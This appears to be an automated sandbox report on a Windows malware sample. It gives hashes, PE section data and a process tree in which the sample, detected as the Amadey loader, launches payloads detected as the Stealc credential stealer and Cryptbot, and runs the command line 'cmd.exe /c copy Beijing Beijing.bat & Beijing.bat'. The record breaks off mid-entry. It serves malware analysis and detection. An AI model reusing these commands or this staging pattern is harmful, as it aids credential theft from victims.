                                                                                                                                                                          Entropy (8bit):3.4879049584876896
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:84B813CD1AFCBDCC8BAAC41568AEBC5D
                                                                                                                                                                          SHA1:5E2D5135ED52B8BE661F86A00E043961A62BD08F
                                                                                                                                                                          SHA-256:11F4CE4CB02CC1D0D43E0D3E1C117BED0FBAB2E4DB9FB1C5366EFBDD595DBCB8
                                                                                                                                                                          SHA-512:E9EED7AB19217747DD45AD753372E592193FFA1FCE8E5E96EB4D207A9173C11DB8F302B0BCB1912D4B6343439843E94131CB6622D3A8C0609745A9A30CF1F71C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:.....D.....M....U.*.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.948339549086525
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:file.exe
                                                                                                                                                                          File size:1'913'856 bytes
                                                                                                                                                                          MD5:08fa512abc42a3d5f8ba6ad72f5c550e
                                                                                                                                                                          SHA1:6b38e59bc4dfdebe5396700e918b96fc22a07611
                                                                                                                                                                          SHA256:d573c7e78c05a4d3a653269e00635a56516fefa23a8485a29fdecf75ef5b5e18
                                                                                                                                                                          SHA512:ee1cec539286e2b3c8dbe792f288004e0c02fdbafdb149da9ce7c5a76105f0af256df25bffd9070179e23cf665804f9b52ffe10c1c598c21fd4050b957a1490d
                                                                                                                                                                          SSDEEP:24576:GbEsevvEMsoxrwgtiN+hyt13k5XheTvhDXX4lzvscT01IOBTqRglaWF/SwJMYGjS:f1xZiN+hSk5Xh48lzTI1lqKlfi3E
                                                                                                                                                                          TLSH:659533283A251D3DC67A64B0B703A3A56FFF893486D2C8B570C4556CAB01F1E6B5F263
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                          Entrypoint:0x8b9000
                                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:6
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp 00007F9278AFB3BAh
                                                                                                                                                                          movlps xmm3, qword ptr [00000000h]
                                                                                                                                                                          add cl, ch
                                                                                                                                                                          add byte ptr [eax], ah
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [esi], al
                                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax+0Ah], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          or byte ptr [eax+00000000h], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          xor byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          mov byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          and al, byte ptr [eax]
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          or byte ptr [eax+00000000h], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          xor byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x4d8.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b70500x10mahfbdtk
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x4b70000x18mahfbdtk
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          0x10000x680000x2de00b111b03939ab0586e0c89a2d8d1b82e9False0.9973443886239782data7.9851176619482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x690000x4d80x4006be2d48c31ff2048220492b763343b34False0.5859375data4.954875546270359IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          0x6b0000x2ab0000x2006c0ac510ad12f3440a0fab02aaa2a1d5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          mahfbdtk0x3160000x1a20000x1a1600e2011628a3dffd88328d04b08f1875d3False0.9942348008385744data7.953063770644612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          akwexcdv0x4b80000x10000x600008c754d28ca1060073c16fd6620b4daFalse0.5345052083333334data4.8008169789768464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .taggant0x4b90000x30000x2200f01bc92bbd5f20a285f1cafc8a00eebaFalse0.07961856617647059DOS executable (COM)1.031760250349678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_MANIFEST0x4b70600x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                                                                                                                                                          RT_MANIFEST0x4b73460x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                          DLLImport
                                                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:00:02:09
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                          Imagebase:0x7ff7244c0000
                                                                                                                                                                          File size:329'504 bytes
                                                                                                                                                                          MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:1
                                                                                                                                                                          Start time:00:02:09
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\sppsvc.exe
                                                                                                                                                                          Imagebase:0x7ff61f770000
                                                                                                                                                                          File size:4'630'384 bytes
                                                                                                                                                                          MD5 hash:320823F03672CEB82CC3A169989ABD12
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:00:02:09
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:00:02:10
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:00:02:10
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:00:02:10
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:00:02:10
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                          Imagebase:0xa00000
                                                                                                                                                                          File size:1'913'856 bytes
                                                                                                                                                                          MD5 hash:08FA512ABC42A3D5F8BA6AD72F5C550E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:00:02:14
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:9
                                                                                                                                                                          Start time:00:02:17
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:1'913'856 bytes
                                                                                                                                                                          MD5 hash:08FA512ABC42A3D5F8BA6AD72F5C550E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 50%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:10
                                                                                                                                                                          Start time:00:02:19
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:1'913'856 bytes
                                                                                                                                                                          MD5 hash:08FA512ABC42A3D5F8BA6AD72F5C550E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:01:22:51
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:13
                                                                                                                                                                          Start time:01:23:00
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:1'913'856 bytes
                                                                                                                                                                          MD5 hash:08FA512ABC42A3D5F8BA6AD72F5C550E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:01:23:06
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                          Imagebase:0x7ff7ac320000
                                                                                                                                                                          File size:468'120 bytes
                                                                                                                                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:16
                                                                                                                                                                          Start time:01:23:06
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:17
                                                                                                                                                                          Start time:01:23:07
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
                                                                                                                                                                          Imagebase:0x770000
                                                                                                                                                                          File size:314'368 bytes
                                                                                                                                                                          MD5 hash:68A99CF42959DC6406AF26E91D39F523
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                          • Detection: 76%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:01:23:17
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"
                                                                                                                                                                          Imagebase:0xd0000
                                                                                                                                                                          File size:7'110'656 bytes
                                                                                                                                                                          MD5 hash:87E4E869971CEC9573811040F6140157
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 32%, ReversingLabs
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:19
                                                                                                                                                                          Start time:01:23:22
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'224'767 bytes
                                                                                                                                                                          MD5 hash:5D97C2475C8A4D52E140EF4650D1028B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:20
                                                                                                                                                                          Start time:01:23:24
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:01:23:24
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:01:23:27
                                                                                                                                                                          Start date:01/11/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"
                                                                                                                                                                          Imagebase:0xe10000
                                                                                                                                                                          File size:5'952'512 bytes
                                                                                                                                                                          MD5 hash:5009B1EF6619ECA039925510D4FD51A1
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
